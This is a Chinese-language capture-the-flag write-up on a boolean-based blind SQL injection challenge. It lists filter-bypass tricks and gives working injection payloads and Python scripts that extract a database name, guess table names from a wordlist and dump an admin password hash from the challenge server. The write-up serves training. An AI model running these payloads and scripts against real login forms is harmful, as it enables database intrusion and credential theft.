目录
绕过空格
/**/绕过
()绕过
回车绕过
·(键按钮)绕过
等号绕过
绕过,(逗号)使用substr
下面存在基本绕过方式
注释符绕过
/**/绕过
#绕过
/*注释内容*/绕过
//注释绕过
大小写绕过
绕过information过滤
简单的爆破表名
bugku基于布尔的SQL盲注_bugku 基于布尔的sql盲注-CSDN博客
考核中遇到的题 爆出数据库 就完全不知道怎么做了
这里拿到原题记录一下
首先拿到登入界面我们来进行测试
输入 admin 密码随便输入
输入 admin123 密码随便输入
发现了 这里admin是存在数据库中的 但是不存在就会回显不存在
所以这里我们可以确定了 admin 是true的
然后我们开始fuzz
发现过滤了巨多。。。。。where information啥都是过滤
然后我们一个一个绕过
绕过空格
/**/绕过
select/**/*/**/from/**/username
()绕过
select(*)from(username)
回车绕过
因为mysql只有在遇到; 才会执行
所以我们可以通过 %0a绕过select%0a*%0afrom%0ausername
·(键按钮)绕过
select`*`from`username`
这里存在许多的绕过方式
下面是等号的绕过
等号绕过
这里我们可以使用<>绕过等号
<>是不等号的意思所以我们可以通过<>来构造
a'or(1<>2)# 这里回显是 1 因为1不等于2 并且admin存在a’or(1<>1)# 这里回显是 0 因为1等于1
目前我们可以开始爆破数据库了
我们可以知道构造payload
a'or(ascii(substr(database()),0,1)<>1)#
但是我们发现 这里被过滤了 因为 , 被过滤
所以我们无法使用这个方法
绕过,(逗号)使用substr
这里我们学习到一种方式
substr('flag' from 1)
SELECT substr('flag' from 1) --->flagSELECT substr('flag' from 2) --->lagSELECT substr('flag' from 3) --->agSELECT substr('flag' from 4) --->g
但是我们这里发现 我们无法通过 1 搜索到flag后然后查询
我们可以使用倒装输出看看 reverse
SELECT substr((reverse(substr('flag' FROM 1)))FROM 4)fSELECT substr((reverse(substr('flag' FROM 2)))FROM 3)lSELECT substr((reverse(substr('flag' FROM 3)))FROM 2)aSELECT substr((reverse(substr('flag' FROM 4)))FROM 1)g
实现了读取
这里我们就可以进行payload拼接
a'or(ord(substr((reverse(substr((database())from(2))))from(8)))<>98)#
我们再来分析一下
a'or(ord(substr((reverse(substr((database())from(1))))from(8)))<>1)#内容其实是a' or ord(substr(reverse(substr(database() from 1)) from 1))<>1我们首先通过substr(database() from 1) 来输出但是这个时候是返回全部内容 假如database为admin
那么这个时候回显是admin我们使用倒装reverse(substr(database() from 1))返回的是 nimda这个时候我们访问最大的值这里是5substr(reverse(substr(database() from 1)) from 5)就返回了 a我们就获取了第一个字符的内容这里为什么要使用ord呢 因为ascii在mysql中 大小写的 编码是一样的 's'='S'
所以我们开始写python代码
import requests
import string,hashlib
import time
url = 'http://114.67.175.224:13436/'
string1 = string.digits + (string.ascii_lowercase)
password = ''
for i in range(1,8):for j in range(8,0,-1):for k in range(48, 128):payload = """a'or(ord(substr((reverse(substr((database())from({0}))))from({1})))<>{2})#""".format(i, j, k)data = {'username':payload,'password':'abcd'}try:res = requests.post(url, data=data, timeout=5)except:time.sleep(2)res = requests.post(url, data=data, timeout=5)if 'username does not exist' in res.text:password += chr(k)print(password)breakres.close()
获取了数据库名称 blindsql
但是我们继续进行的时候就发现了 无法继续
因为过滤了 information where 等
下面存在基本绕过方式
注释符绕过
这里的原理是 注释符后的会被执行
/**/绕过
select * from users /**/ where id = 1
#绕过
select * from users # where id = 1
/*注释内容*/绕过
select * from users /* where id = 1 */
//注释绕过
select * from users // where id = 1
大小写绕过
如果waf对大小写不敏感我们就可以使用这个
sElEct * from users whErE id = 1 union sElEct 1,2,3
绕过information过滤
sys.schema_auto_increment_columnssys.schema_table_statistics_with_buffersys.x$schema_table_statistics_with_buffersys.x$schema_table_statisticssys.x$ps_schema_table_statistics_iomysql.innodb_table_statsmysql.innodb_index_stats
但是在这之前我们先需要看看我们的version是什么
修改上面的payload
payload = """a'or(ord(substr((reverse(substr((version())from({0}))))from({1})))<>{2})#""".format(i, j, k)
所以上面都不能用。。。。
简单的爆破表名
这里我们就开始思考能不能爆破
这里介绍两个
a' or exists(select * from user)#这里如果返回true 就说明 user存在a'or admin.test is null 这里返回true 说明不存在
但是这两个都不能用 因为全过滤了
这里我们就开始犯了难了
这里我们可以使用另一个爆破方法
a'or(length((select(group_concat(flag))from(blindsql.test)))>0)#这里的test和flag是我们需要替换到字典中的内容的这里其实就是真的纯纯爆破
import requests
import sysurl = 'http://114.67.175.224:13436/'
res = '爆破了'
shuzi = 1
#读取字典
file = open(r'C:\Users\Administrator\Desktop\攻防\渗透\字典\密码\Top50.txt','r')
lines = file.readlines()
file.close()
lines = [line.rstrip() for line in lines]
for line in lines:for line2 in lines:paylaod = """a'or(length((select(group_concat({0}))from(blindsql.{1})))>0)#""".format(line2,line)print(paylaod)data = {'username':paylaod,'password':'asdba'}responce = requests.post(url=url,data=data)shuzi +=1if "password error!" in responce.text:print("爆破结束----爆破了"+str(shuzi)+"次")print(paylaod)print("表名为:"+line)print("字段名为:"+line2)sys.exit()
但是这里确实没有字典 我也没有找到字典能够爆破
然后我们直接进行读取即可
a'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from(1)))from(32)))<>52)#
import requests
import string,hashlib
import time
url = 'http://114.67.175.224:18038/'
string1 = string.digits + (string.ascii_lowercase)
password = ''
for i in range(1,40):for j in range(40,0,-1):for k in range(48, 128):payload = """a'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from({0})))from({1})))<>{2})#""".format(i, j, k)data = {'username':payload,'password':'abcd'}try:res = requests.post(url, data=data, timeout=5)except:time.sleep(2)res = requests.post(url, data=data, timeout=5)if 'username does not exist!' in res.text:password += chr(k)print(password)breakres.close()
4dcc88f8f1bc05e7c2ad1a60288481a2
但是确实这个爆破太慢了
我这里再介绍另一个方法
a'or((ascii(substr((select(password))from(1)))-48))--这里其实最主要就是ascii 和 -48-48 是 减去48就是我们查询到passaword的首字母 如果为48 即 1 就输出 0 那么整体输出0如果不为48 就输出1 整体就为1这里不需要使用倒装因为ascii(substr((select(password))from(1)这里只需要修改 1 2 3 就可以获取这个首字符的ascii
所以我们开始构造
import requests
import string,hashlib
import time
url = 'http://114.67.175.224:18038/'
string1 = string.digits + (string.ascii_lowercase)
password = ''
for i in range(1,40):for k in range(48, 128):payload = """a'or((ascii(substr((select(password))from({0})))-{1}))#""".format(i,k)data = {'username':payload,'password':'abcd'}try:res = requests.post(url, data=data, timeout=5)except:time.sleep(2)res = requests.post(url, data=data, timeout=5)if 'username does not exist!' in res.text:password += chr(k)print(password)breakres.close()
速度确实快了很多
然后我们登入即可